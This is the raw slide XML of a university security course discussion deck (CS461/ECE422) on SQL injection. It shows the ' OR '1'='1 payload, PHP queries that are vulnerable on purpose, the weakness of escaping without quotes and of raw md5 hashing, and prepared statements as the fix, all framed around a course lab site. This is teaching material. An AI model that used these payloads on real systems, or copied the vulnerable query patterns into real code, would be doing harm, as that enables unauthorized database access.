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6"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="288" r:id="rId3"/>
    <p:sldId id="287" r:id="rId4"/>
    <p:sldId id="267" r:id="rId5"/>
    <p:sldId id="291" r:id="rId6"/>
    <p:sldId id="292" r:id="rId7"/>
    <p:sldId id="293" r:id="rId8"/>
    <p:sldId id="294" r:id="rId9"/>
    <p:sldId id="295" r:id="rId10"/>
    <p:sldId id="296" r:id="rId11"/>
    <p:sldId id="297" r:id="rId12"/>
    <p:sldId id="298" r:id="rId13"/>
    <p:sldId id="299" r:id="rId14"/>
    <p:sldId id="281" r:id="rId15"/>
    <p:sldId id="282" r:id="rId16"/>
    <p:sldId id="283" r:id="rId17"/>
    <p:sldId id="289" r:id="rId18"/>
    <p:sldId id="300" r:id="rId19"/>
    <p:sldId id="301" r:id="rId20"/>
    <p:sldId id="302" r:id="rId21"/>
    <p:sldId id="303" r:id="rId22"/>
    <p:sldId id="304" r:id="rId23"/>
    <p:sldId id="305" r:id="rId24"/>
    <p:sldId id="257" r:id="rId25"/>
    <p:sldId id="258" r:id="rId26"/>
    <p:sldId id="264" r:id="rId27"/>
    <p:sldId id="265" r:id="rId28"/>
    <p:sldId id="266" r:id="rId29"/>
    <p:sldId id="259" r:id="rId30"/>
    <p:sldId id="260" r:id="rId31"/>
    <p:sldId id="262" r:id="rId32"/>
    <p:sldId id="261" r:id="rId33"/>
    <p:sldId id="269" r:id="rId34"/>
    <p:sldId id="285" r:id="rId35"/>
    <p:sldId id="270" r:id="rId36"/>
    <p:sldId id="286" r:id="rId37"/>
    <p:sldId id="271" r:id="rId38"/>
    <p:sldId id="272" r:id="rId39"/>
    <p:sldId id="275" r:id="rId40"/>
    <p:sldId id="273" r:id="rId41"/>
    <p:sldId id="274" r:id="rId42"/>
    <p:sldId id="276" r:id="rId43"/>
    <p:sldId id="278" r:id="rId44"/>
    <p:sldId id="279" r:id="rId4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308" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="84" d="100"/>
          <a:sy n="84" d="100"/>
        </p:scale>
        <p:origin x="1440" y="7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presProps" Target="presProps.xml"/><Relationship Id="rId50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277504-0661-44FA-A41B-9E506BF97900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1E713D1-F9C8-4BC7-A7BB-F7F2F4EB7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091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13D1-F9C8-4BC7-A7BB-F7F2F4EB7A8D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18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1E713D1-F9C8-4BC7-A7BB-F7F2F4EB7A8D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61918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80529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971947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912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04992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4939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77577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129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03511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5567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71827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1183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1334FB-D3C5-4849-B106-91B3B47398F7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/15/2016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1751F-D6D8-478A-A417-43A13267003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6571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://cvk.posthaven.com/sql-injection-with-raw-md5-hashes" TargetMode="External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://php.net/manual/en/function.md5.php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://permalink.co/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hyperlink" Target="http://www.guru99.com/learn-sql-injection-with-practical-example.html" TargetMode="Externa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://www.dvwa.co.uk/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hyperlink" Target="http://api.jquery.com/load/" TargetMode="Externa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24000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/>
              <a:t>Web Application Security Discussion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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Hyun Bin Lee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>University of Illinois</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CS461/ECE422 Spring 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76939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758" y="475107"/>
            <a:ext cx="822960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5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>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6950" y="1600263"/>
            <a:ext cx="8050022" cy="452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39855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04566" y="475107"/>
            <a:ext cx="313880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  <a:tabLst>
                <a:tab pos="1134745" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>SQL	Injection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46950" y="1600263"/>
            <a:ext cx="8050022" cy="452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990920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1986"/>
            <a:ext cx="8229600" cy="828304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="149733" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1814830" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-10" dirty="0"/>
              <a:t>(cont.)</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1447825"/>
            <a:ext cx="8001000" cy="4498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459401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733" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1814830">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-10" dirty="0"/>
              <a:t>(cont.)</a:t>
            </a:r>
            <a:endParaRPr sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1447825"/>
            <a:ext cx="8001000" cy="44983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3505136"/>
            <a:ext cx="8382000" cy="2554605"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8382000" h="2554604">
                <a:moveTo>
                  <a:pt x="0" y="2554605"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8382000" y="2554605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8382000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2554605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304800" y="3505136"/>
            <a:ext cx="8382000" cy="2554605"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8382000" h="2554604">
                <a:moveTo>
                  <a:pt x="0" y="2554605"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8382000" y="2554605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8382000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2554605"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25400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3281171" y="5387340"/>
            <a:ext cx="2139696" cy="856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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383540" y="3526408"/>
            <a:ext cx="7056120" cy="24720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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-15" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>first_name, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>last_name </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>FROM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users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WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user_id </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>=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'$id'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45"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="33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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-15" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>first_name, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>last_name </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>FROM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20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>users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WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user_id </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>= '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' </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>OR </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>'1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-25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'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128784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Protection?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lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider a webpage which escapes each  ' from input to \' using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysql_real_escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>().</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can this protection save the webpage against SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.sqlinjection.net/advanced/php/mysql-real-escape-string/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856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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Protection?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/>
              <a:t>Consider a webpage which escapes each  ' from input to \' using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysql_real_escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>().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Yes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT * FROM table WHERE name =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' $_GET['name'] '</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Receives string as an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>input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616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SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Protection?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lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider a webpage which escapes each  ' from input to \' using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysql_real_escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>().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NO!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT * FROM table WHERE id=$_GET['id']</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is only helpful when input parameter is enclosed in quotes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fix: SELECT * FROM table WHERE id='$_GET['id']'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Making multiple function calls can be expensive. What are alternative solutions?</a:t>
            </a:r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pPr lvl="0"/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0846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Prepared </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Statements (PHP example)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 smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>conn = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>servername</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, $username, $password, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>dbname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>);  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>//prepare and bind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/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> = $conn-&gt;prepare(“SELECT * FROM table WHERE name=?"); $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>bind_param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>("s", $name);  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>//execute 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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-&gt;execute();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42943422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209800" y="2743200"/>
            <a:ext cx="4591685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" dirty="0"/>
              <a:t>Approaching</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-65" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>2.2.1.3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535940" y="6051499"/>
            <a:ext cx="6532880" cy="27699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n-US" dirty="0">
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>cvk.posthaven.com/sql-injection-with-raw-md5-hashes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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61476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1986"/>
            <a:ext cx="8229600" cy="828304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="149733" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1662430" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400" spc="-5" dirty="0"/>
              <a:t>Escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="5" dirty="0"/>
              <a:t>Hashing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9917"/>
            <a:ext cx="7294245" cy="33331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000" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>$username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425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mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>($_POST[’username’]);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480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>$password </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>md5($_POST[’password’],</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-58419">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>$sql_s </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>= "SELECT * </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>users </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>WHERE username=’$username’ and  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pw=’$password’";</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="297180">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>$rs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-55" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>mysql_query($sql_s);</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="88900" marR="2982595">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1190"/>
              </a:spcBef>
            </a:pP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http://php.net/manual/en/function.md5.php </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>md5 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>function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manual</a:t>
            </a:r>
            <a:endParaRPr sz="18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1850">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="88900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Why </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-35" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>vulnerable?</a:t>
            </a:r>
            <a:endParaRPr sz="18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32302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Introducing Bungle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>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://bungle.cs461.cs.Illinois.edu/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This web application which has following capabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Search: makes a query through GET request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Login: makes a POST request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Logout (enabled when logged in): makes a POST request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Create account: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>makes a POST request</a:t>
            </a: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017507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1986"/>
            <a:ext cx="8229600" cy="828304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="149733" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2203450" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400" spc="-5" dirty="0"/>
              <a:t>Similar</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-15" dirty="0"/>
              <a:t>examples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700009" cy="97599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55600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="320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http://www.guru99.com/learn-sql-injection-</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" u="heavy" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
